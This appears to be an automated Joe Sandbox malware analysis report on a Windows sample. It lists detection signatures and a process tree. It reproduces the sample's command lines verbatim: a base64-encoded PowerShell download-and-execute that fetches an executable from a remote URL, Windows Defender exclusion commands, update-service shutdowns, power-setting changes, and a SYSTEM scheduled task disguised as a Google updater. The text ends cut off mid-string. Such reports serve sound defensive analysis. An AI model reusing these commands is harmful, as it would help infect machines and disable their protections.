Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe
Analysis ID:1451678
MD5:3b5865192ea41263be0a78b4d8a7c795
SHA1:946d09aeb6ad5c0fd13d4bbd24ed08623f84e413
SHA256:1f5b18d6733e467c7d89b90cd82f4ec287423ab049617b3e1d0dda246731ce81
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe" MD5: 3B5865192EA41263BE0A78B4D8A7C795)
    • powershell.exe (PID: 7324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABsAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBpAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBwAHIAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwB0AGEAcgB6AGEAbgByAGUALwBtAHkAcgBlAHAAbwAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAGEALwBzAHQAZQBhAG0ALgBlAHgAZQAnACwAIAA8ACMAdQBnAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHEAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAHoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwAuAGUAeABlACcAKQApADwAIwB2AHQAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHcAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbABzAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwB2AGMALgBlAHgAZQAnACkAPAAjAGcAZwBtACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • svc.exe (PID: 7576 cmdline: "C:\Users\user\AppData\Local\Temp\svc.exe" MD5: 327B8ED0CDEBAE6962718656B5A72A4C)
        • dialer.exe (PID: 7912 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
          • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
          • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
          • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
          • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1652 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1724 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1824 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1840 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1940 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 1948 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 7592 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7752 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7800 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7812 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7828 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7844 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7860 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 7876 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7948 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7996 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 8060 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 8084 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • powershell.exe (PID: 7936 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tcvsvxpo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7324JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi32_7324.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Operating System Destruction

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 7752, ProcessName: cmd.exe

      System Summary

      barindex
      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tcvsvxpo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tcvsvxpo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tcvsvxpo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 7936, ProcessName: powershell.exe
      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tcvsvxpo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tcvsvxpo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tcvsvxpo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 7936, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABsAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBpAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBwAHIAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwB0AGEAcgB6AGEAbgByAGUALwBtAHkAcgBlAHAAbwAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAGEALwBzAHQAZQBhAG0ALgBlAHgAZQAnACwAIAA8ACMAdQBnAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHEAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAHoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwAuAGUAeABlACcAKQApADwAIwB2AHQAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHcAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbABzAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwB2AGMALgBlAHgAZQAnACkAPAAjAGcAZwBtACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABsAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBpAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBwAHIAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwB0AGEAcgB6AGEAbgByAGUALwBtAHkAcgBlAHAAbwAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAGEALwBzAHQAZQBhAG0ALgBlAHgAZQAnACwAIAA8ACMAdQBnAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHEAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAHoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwAuAGUAeABlACcAKQApADwAIwB2AHQAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHcAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbABzAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwB2AGMALgBlAHgAZQAnACkAPAAjAGcAZwBtACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe, ParentProcessId: 7280, ParentProcessName: SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQBy
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7592, ProcessName: powershell.exe
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABsAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBpAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBwAHIAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwB0AGEAcgB6AGEAbgByAGUALwBtAHkAcgBlAHAAbwAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAGEALwBzAHQAZQBhAG0ALgBlAHgAZQAnACwAIAA8ACMAdQBnAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHEAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAHoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwAuAGUAeABlACcAKQApADwAIwB2AHQAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHcAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbABzAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwB2AGMALgBlAHgAZQAnACkAPAAjAGcAZwBtACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABsAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBpAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBwAHIAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwB0AGEAcgB6AGEAbgByAGUALwBtAHkAcgBlAHAAbwAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAGEALwBzAHQAZQBhAG0ALgBlAHgAZQAnACwAIAA8ACMAdQBnAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHEAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAHoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwAuAGUAeABlACcAKQApADwAIwB2AH